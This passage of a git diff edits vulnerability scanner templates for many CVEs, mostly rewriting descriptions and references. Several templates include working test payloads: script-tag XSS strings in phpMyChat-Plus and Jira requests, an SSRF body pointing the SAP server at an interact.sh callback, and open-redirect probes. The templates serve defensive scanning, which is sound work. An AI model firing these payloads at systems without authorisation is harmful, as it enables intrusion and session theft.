MicroStrategy Library before 11.1.3 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-18957
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18957
- https://www.cvedetails.com/cve/CVE-2019-18957/
- https://seclists.org/bugtraq/2019/Nov/23
- https://packetstormsecurity.com/files/155320/MicroStrategy-Library-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-18957
remediation: The issue can be resolved by downloading and installing 1.1.3, which has the patch.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-18957
cwe-id: CWE-79
tags: xss,seclists,cve,cve2019,microstrategy
tags: cve2019,microstrategy,packetstorm,xss,seclists,cve
requests:
- method: GET
@ -37,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/18

25
cves/2019/CVE-2019-19908.yaml
View File

@ -4,7 +4,8 @@ info:
name: phpMyChat-Plus 1.98 - Cross-Site Scripting
author: madrobot
severity: medium
description: phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
description: |
phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
reference:
- https://cinzinga.github.io/CVE-2019-19908/
- http://ciprianmp.com/
@ -15,20 +16,30 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-19908
cwe-id: CWE-79
tags: cve,cve2019,xss,injection,javascript
metadata:
verified: true
google-dork: inurl:"/plus/pass_reset.php"
tags: cve,cve2019,phpMyChat,xss
requests:
- method: GET
path:
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'username = "</script><script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
- type: word
words:
- "<script>alert(1337)</script>"
part: body
# Enhanced by mp on 2022/08/31

20
cves/2019/CVE-2019-3402.yaml
View File

@ -1,10 +1,11 @@
id: CVE-2019-3402
info:
name: Jira <8.1.1 - Cross-Site Scripting
name: Jira < 8.1.1 - Cross-Site Scripting
author: pdteam
severity: medium
description: Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
description: |
Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
reference:
- https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
- https://jira.atlassian.com/browse/JRASERVER-69243
@ -15,6 +16,7 @@ info:
cve-id: CVE-2019-3402
cwe-id: CWE-79
metadata:
verified: true
shodan-query: http.component:"Atlassian Jira"
tags: cve,cve2019,atlassian,jira,xss
@ -25,12 +27,18 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "'<script>alert(1)</script>' does not exist"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
- type: word
words:
- "<script>alert(1)</script>"
part: body
# Enhanced by mp on 2022/08/31

7
cves/2019/CVE-2019-3912.yaml
View File

@ -1,13 +1,14 @@
id: CVE-2019-3912
info:
name: LabKey Server < 18.3.0 - Open Redirect
name: LabKey Server Community Edition <18.3.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: An open redirect vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 via the /__r1/ returnURL parameter allows an unauthenticated remote attacker to redirect users to arbitrary web sites.
description: LabKey Server Community Edition before 18.3.0-61806.763 contains an open redirect vulnerability via the /__r1/ returnURL parameter, which allows an attacker to redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.tenable.com/security/research/tra-2019-03
- https://www.cvedetails.com/cve/CVE-2019-3912
- https://nvd.nist.gov/vuln/detail/CVE-2019-3912
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -27,3 +28,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

7
cves/2019/CVE-2019-7275.yaml
View File

@ -1,15 +1,16 @@
id: CVE-2019-7275
info:
name: Open Redirect in Optergy Proton/Enterprise BMS
name: Optergy Proton/Enterprise Building Management System - Open Redirect
author: 0x_Akoko
severity: medium
description: Optergy Proton/Enterprise devices allow Open Redirect.
description: Optergy Proton/Enterprise Building Management System contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://packetstormsecurity.com/files/155268/Optergy-Proton-Enterprise-BMS-2.3.0a-Open-Redirect.html
- https://applied-risk.com/resources/ar-2019-008
- https://cxsecurity.com/issue/WLB-2019110074
- https://applied-risk.com/labs/advisories
- https://nvd.nist.gov/vuln/detail/CVE-2019-7275
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -27,3 +28,5 @@ requests:
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
# Enhanced by md on 2022/10/13

7
cves/2019/CVE-2019-9915.yaml
View File

@ -1,15 +1,16 @@
id: CVE-2019-9915
info:
name: GetSimpleCMS 3.3.13 - Open Redirection
name: GetSimple CMS 3.3.13 - Open Redirect
author: 0x_Akoko
severity: medium
description: GetSimpleCMS 3.3.13 has an Open Redirect via the admin/index.php redirect parameter.
description: GetSimple CMS 3.3.13 contains an open redirect vulnerability via the admin/index.php redirect parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.invicti.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms
- https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300
- https://www.cvedetails.com/cve/CVE-2019-9915
- https://www.netsparker.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms/
- https://nvd.nist.gov/vuln/detail/CVE-2019-9915
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -33,3 +34,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

7
cves/2020/CVE-2020-14181.yaml
View File

@ -21,13 +21,16 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/secure/ViewUserHover.jspa"
- '{{BaseURL}}/secure/ViewUserHover.jspa'
matchers-condition: and
matchers:
- type: word
words:
- "User does not exist"
- 'User does not exist'
- 'content="JIRA"'
condition: and
- type: status
status:
- 200

7
cves/2020/CVE-2020-15129.yaml
View File

@ -1,15 +1,16 @@
id: CVE-2020-15129
info:
name: Open-redirect in Traefik
name: Traefik - Open Redirect
author: dwisiswant0
severity: medium
description: There exists a potential open redirect vulnerability in Traefik's handling of the X-Forwarded-Prefix header. Active Exploitation of this issue is unlikely as it would require active header injection, however the Traefik team may want to address this issue nonetheless to prevent abuse in e.g. cache poisoning scenarios.
description: Traefik before 1.7.26, 2.2.8, and 2.3.0-rc3 contains an open redirect vulnerability in the X-Forwarded-Prefix header. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://securitylab.github.com/advisories/GHSL-2020-140-Containous-Traefik
- https://github.com/containous/traefik/releases/tag/v2.2.8
- https://github.com/containous/traefik/pull/7109
- https://github.com/containous/traefik/security/advisories/GHSA-6qq8-5wq3-86rp
- https://nvd.nist.gov/vuln/detail/CVE-2020-15129
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.7
@ -35,3 +36,5 @@ requests:
part: body
words:
- "<a href=\"https://foo.nl/dashboard/\">Found</a>"
# Enhanced by md on 2022/10/13

10
cves/2020/CVE-2020-17526.yaml
View File

@ -1,20 +1,22 @@
id: CVE-2020-17526
info:
name: Apache Airflow < 1.10.14 - Authentication Bypass
name: Apache Airflow <1.10.14 - Authentication Bypass
author: piyushchhiroliya
severity: high
description: |
Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A.
Apache Airflow prior to 1.10.14 contains an authentication bypass vulnerability via incorrect session validation with default configuration. An attacker on site A can access unauthorized Airflow on site B through the site A session.
reference:
- https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise
- https://nvd.nist.gov/vuln/detail/CVE-2020-17526
- https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E
- http://www.openwall.com/lists/oss-security/2020/12/21/1
- https://nvd.nist.gov/vuln/detail/CVE-2020-17526
remediation: Change default value for [webserver] secret_key config.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
cvss-score: 7.7
cve-id: CVE-2020-17526
cwe-id: CWE-287
metadata:
fofa-query: Apache Airflow
verified: "true"
@ -49,3 +51,5 @@ requests:
- "contains(body_1, 'Redirecting...')"
- "status_code_1 == 302"
condition: and
# Enhanced by md on 2022/10/19

7
cves/2020/CVE-2020-18268.yaml
View File

@ -1,14 +1,15 @@
id: CVE-2020-18268
info:
name: Z-BlogPHP 1.5.2 - Open Redirect
name: Z-Blog <=1.5.2 - Open Redirect
author: 0x_Akoko
severity: medium
description: Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php."
description: Z-Blog 1.5.2 and earlier contains an open redirect vulnerability via the redirect parameter in zb_system/cmd.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/zblogcn/zblogphp/issues/216
- https://www.cvedetails.com/cve/CVE-2020-18268
- https://github.com/zblogcn/zblogphp/issues/209
- https://nvd.nist.gov/vuln/detail/CVE-2020-18268
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -37,3 +38,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

6
cves/2020/CVE-2020-20285.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2020-20285
info:
name: zzcms - Reflected XSS
name: ZZcms - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
There is a XSS in the user login page in zzcms 2019. Users can inject js code by the referer header via user/login.php
ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks.
reference:
- https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-20285
@ -41,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/17

7
cves/2020/CVE-2020-22840.yaml
View File

@ -1,14 +1,15 @@
id: CVE-2020-22840
info:
name: b2evolution CMS - Open Redirect
name: b2evolution CMS <6.11.6 - Open Redirect
author: geeknik
severity: medium
description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php.
description: b2evolution CMS before 6.11.6 contains an open redirect vulnerability via the redirect_to parameter in email_passthrough.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/b2evolution/b2evolution/issues/102
- http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html
- https://www.exploit-db.com/exploits/49554
- https://nvd.nist.gov/vuln/detail/CVE-2020-22840
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -26,3 +27,5 @@ requests:
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
part: header
# Enhanced by md on 2022/10/13

9
cves/2020/CVE-2020-23015.yaml
View File

@ -1,13 +1,14 @@
id: CVE-2020-23015
info:
name: OPNsense 20.1.5. Open Redirect
name: OPNsense <=20.1.5 - Open Redirect
author: 0x_Akoko
severity: medium
description: An open redirect issue was discovered in OPNsense through 20.1.5. The redirect parameter "url" in login page was not filtered and can redirect user to any website.
description: OPNsense through 20.1.5 contains an open redirect vulnerability via the url redirect parameter in the login page, which is not filtered. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/opnsense/core/issues/4061
- https://www.cvedetails.com/cve/CVE-2020-23015
- https://nvd.nist.gov/vuln/detail/CVE-2020-23015
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -25,4 +26,6 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
# Enhanced by md on 2022/10/13

7
cves/2020/CVE-2020-24550.yaml
View File

@ -1,12 +1,13 @@
id: CVE-2020-24550
info:
name: EpiServer <13.2.7 - Open Redirect
name: EpiServer Find <13.2.7 - Open Redirect
author: dhiyaneshDK
severity: medium
description: An Open Redirect vulnerability in EpiServer Find before 13.2.7 allows an attacker to redirect users to untrusted websites via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL.
description: EpiServer Find before 13.2.7 contains an open redirect vulnerability via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://labs.nettitude.com/blog/cve-2020-24550-open-redirect-in-episerver-find/
- https://nvd.nist.gov/vuln/detail/CVE-2020-24550
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -29,3 +30,5 @@ requests:
- type: status
status:
- 301
# Enhanced by md on 2022/10/13

2
cves/2020/CVE-2020-35489.yaml
View File

@ -15,7 +15,7 @@ info:
cvss-score: 10
cve-id: CVE-2020-35489
cwe-id: CWE-434
tags: cve,cve2020,wordpress,wp-plugin,rce,upload,intrusive
tags: cve,cve2020,wordpress,wp-plugin,rce,fileupload,intrusive
requests:
- method: GET

7
cves/2020/CVE-2020-36365.yaml
View File

@ -1,14 +1,15 @@
id: CVE-2020-36365
info:
name: Smartstore < 4.1.0 - Open Redirect
name: Smartstore <4.1.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect.
description: Smartstore (aka "SmartStoreNET") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/smartstore/SmartStoreNET/issues/2113
- https://www.cvedetails.com/cve/CVE-2020-36365
- https://github.com/smartstore/SmartStoreNET
- https://nvd.nist.gov/vuln/detail/CVE-2020-36365
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -29,3 +30,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/14

23
cves/2020/CVE-2020-6308.yaml
View File

@ -1,10 +1,11 @@
id: CVE-2020-6308
info:
name: Unauthenticated Blind SSRF in SAP
name: SAP - Unauthenticated Blind SSRF
author: madrobot
severity: medium
description: SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.
description: |
SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.
reference:
- https://github.com/InitRoot/CVE-2020-6308-PoC
- https://launchpad.support.sap.com/#/notes/2943844
@ -14,17 +15,25 @@ info:
cvss-score: 5.3
cve-id: CVE-2020-6308
cwe-id: CWE-918
tags: cve,cve2020,sap,ssrf,oast,blind
tags: cve,cve2020,sap,ssrf,oast,unauth
requests:
- method: POST
path:
- '{{BaseURL}}/AdminTools/querybuilder/logon?framework='
- raw:
- |
POST /AdminTools/querybuilder/logon?framework= HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
aps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: location
words:
- "{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"

12
cves/2020/CVE-2020-8772.yaml
View File

@ -1,19 +1,17 @@
id: CVE-2020-8772
info:
name: WordPress InfiniteWP Client < 1.9.4.5 - Authentication Bypass
name: WordPress InfiniteWP <1.9.4.5 - Authorization Bypass
author: princechaddha,scent2d
severity: critical
description: |
The InfiniteWP Client plugin before 1.9.4.5 for WordPress has a missing
authorization check in iwp_mmb_set_request in init.php. Any attacker who
knows the username of an administrator can log in.
WordPress InfiniteWP plugin before 1.9.4.5 for WordPress contains an authorization bypass vulnerability via a missing authorization check in iwp_mmb_set_request in init.php. An attacker who knows the username of an administrator can log in, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
remediation: Upgrade to InfiniteWP 1.9.4.5 or higher.
reference:
- https://wpscan.com/vulnerability/10011
- https://nvd.nist.gov/vuln/detail/CVE-2020-8772
- https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/
- https://wpvulndb.com/vulnerabilities/10011
remediation: Upgrade to InfiniteWP Client 1.9.4.5 or higher.
- https://nvd.nist.gov/vuln/detail/CVE-2020-8772
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -72,3 +70,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/19

8
cves/2021/CVE-2021-1499.yaml
View File

@ -1,15 +1,15 @@
id: CVE-2021-1499
info:
name: Cisco HyperFlex HX Data Platform - File Upload Vulnerability
name: Cisco HyperFlex HX Data Platform - Arbitrary File Upload
author: gy741
severity: medium
description: A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user.
description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user.
reference:
- https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
- https://nvd.nist.gov/vuln/detail/CVE-2021-1499
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz
- http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-1499
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
@ -53,3 +53,5 @@ requests:
- '"filename:'
- '/tmp/passwd9'
condition: and
# Enhanced by md on 2022/10/20

8
cves/2021/CVE-2021-20031.yaml
View File

@ -1,15 +1,15 @@
id: CVE-2021-20031
info:
name: Sonicwall SonicOS 7.0 - Host Header Injection
name: SonicWall SonicOS 7.0 - Open Redirect
author: gy741
severity: medium
description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack
description: SonicWall SonicOS 7.0 contains an open redirect vulnerability. The values of the Host headers are implicitly set as trusted. An attacker can spoof a particular host header, allowing the attacker to render arbitrary links, obtain sensitive information, modify data, execute unauthorized operations. and/or possibly redirect a user to a malicious site.
reference:
- https://www.exploit-db.com/exploits/50414
- https://nvd.nist.gov/vuln/detail/CVE-2021-20031
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019
- http://packetstormsecurity.com/files/164502/Sonicwall-SonicOS-7.0-Host-Header-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-20031
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -37,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/14

8
cves/2021/CVE-2021-22873.yaml
View File

@ -1,15 +1,15 @@
id: CVE-2021-22873
info:
name: Revive Adserver < 5.1.0 Open Redirect
name: Revive Adserver <5.1.0 - Open Redirect
author: pudsec
severity: medium
description: Revive Adserver before 5.1.0 is vulnerable to open redirects via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts.
description: Revive Adserver before 5.1.0 contains an open redirect vulnerability via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-22873
- https://hackerone.com/reports/1081406
- https://github.com/revive-adserver/revive-adserver/issues/1068
- http://seclists.org/fulldisclosure/2021/Jan/60
- https://nvd.nist.gov/vuln/detail/CVE-2021-22873
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -38,3 +38,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/14

9
cves/2021/CVE-2021-22911.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2021-22911
info:
name: RocketChat - NoSQL injection
name: Rocket.Chat <=3.13 - NoSQL Injection
author: tess,sullo
severity: critical
description: Rocket.Chat server versions 3.11, 3.12 and 3.1 allow unauthenticated access to an API endpoint which leads to NoSQL injection in the database.
description: Rocket.Chat 3.11, 3.12 and 3.13 contains a NoSQL injection vulnerability which allows unauthenticated access to an API endpoint. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- http://packetstormsecurity.com/files/162997/Rocket.Chat-3.12.1-NoSQL-Injection-Code-Execution.html
- https://github.com/vulhub/vulhub/tree/master/rocketchat/CVE-2021-22911
- https://hackerone.com/reports/1130721
- https://nvd.nist.gov/vuln/detail/CVE-2021-22911
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22911
- https://blog.sonarsource.com/nosql-injections-in-rocket-chat
- https://nvd.nist.gov/vuln/detail/CVE-2021-22911
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -47,3 +48,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/10/12

8
cves/2021/CVE-2021-24165.yaml
View File

@ -1,15 +1,15 @@
id: CVE-2021-24165
info:
name: Ninja Forms < 3.4.34 - Administrator Open Redirect
name: WordPress Ninja Forms <3.4.34 - Open Redirect
author: dhiyaneshDk,daffainfo
severity: medium
description: |
The wp_ajax_nf_oauth_connect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place.
WordPress Ninja Forms plugin before 3.4.34 contains an open redirect vulnerability via the wp_ajax_nf_oauth_connect AJAX action, due to the use of a user-supplied redirect parameter and no protection in place. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818
- https://nvd.nist.gov/vuln/detail/CVE-2021-24165
- https://www.wordfence.com/blog/2021/02/one-million-sites-affected-four-severe-vulnerabilities-patched-in-ninja-forms/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24165
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -41,3 +41,5 @@ requests:
- 'status_code_2 == 302'
- "contains(all_headers_2, 'Location: https://interact.sh?client_id=1')"
condition: and
# Enhanced by md on 2022/10/14

10
cves/2021/CVE-2021-24210.yaml
View File

@ -1,17 +1,15 @@
id: CVE-2021-24210
info:
name: PhastPress < 1.111 - Open Redirect
name: WordPress PhastPress <1.111 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
There is an open redirect in the PhastPress WordPress plugin before 1.111 that allows an attacker to malform a request to a page
with the plugin and then redirect the victim to a malicious page. There is also a support comment from another user one year
ago (https://wordpress.org/support/topic/phast-php-used-for-remote-fetch/) that says that the php involved in the request only
go to whitelisted pages but it's possible to redirect the victim to any domain.
WordPress PhastPress plugin before 1.111 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb
- https://plugins.trac.wordpress.org/changeset/2497610/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24210
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -29,3 +27,5 @@ requests:
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
# Enhanced by md on 2022/10/14

2
cves/2021/CVE-2021-24236.yaml
View File

@ -44,10 +44,10 @@ requests:
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="url"
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="checkbox"
yes
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="naam"

8
cves/2021/CVE-2021-24288.yaml
View File

@ -1,13 +1,13 @@
id: CVE-2021-24288
info:
name: AcyMailing < 7.5.0 - Open Redirect
name: WordPress AcyMailing <7.5.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: When using acymailing to subscribe to a newsletter, you make a POST request with various parameters. Turning that to a GET request and adding the parameters as GET parameters, you can successfully
go through with the subscription.
description: WordPress AcyMailing plugin before 7.5.0 contains an open redirect vulnerability due to improper sanitization of the redirect parameter. An attacker turning the request from POST to GET can craft a link containing a potentially malicious landing page and send it to the user.
reference:
- https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97
- https://nvd.nist.gov/vuln/detail/CVE-2021-24288
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -25,3 +25,5 @@ requests:
regex:
